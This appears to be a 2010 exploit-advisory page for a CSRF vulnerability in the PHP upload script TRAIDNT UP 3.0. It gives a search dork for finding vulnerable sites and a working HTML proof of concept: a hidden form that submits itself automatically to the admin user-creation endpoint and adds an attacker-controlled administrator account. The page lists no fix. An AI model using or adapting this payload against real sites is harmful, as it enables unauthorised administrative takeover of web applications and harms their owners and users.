Traidnt Up 3.0 CSRF Vulnerability

2010-12-26 14:15:46

#Title : TRAIDNT UP Version 3.0 - CSRF Add Admin
#Script : TRAIDNT UP Version 3.0
#Language : Php
#Download : http://www.traidnt.net
# http://www.traidnt.net/vb/attachment.php?attachmentid=519880&d=1285278011
#Date : 2010/12/25
#Version : 3.0
#Dork : "Powered by TRAIDNT UP Version 3.0 "
#Found : by P0C T34M >> tnt-r00t
#Homepage : www.p0c.cc



<html>
<form name="p0c" action="http://127.0.0.1/up/admin/users.php?do=addnew" method="post">
<input type="hidden" name="name" value="r00t3d"/>
<input type="hidden" name="password" value="Password"/>
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="birthdate" value="1987"/>
<input type="hidden" name="country" value="SA"/>
<input type="hidden" name="group" value="1"/>
</form>
<script>document.p0c.submit();</script>
</html>
TRAIDNT UP Version 3.0 - CSRF Add Admin
<!-- Dynamic page generated in 0.051 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2010-12-28 03:04:01 -->

Fixes

No fixes

In order to submit a new fix you need to be registered.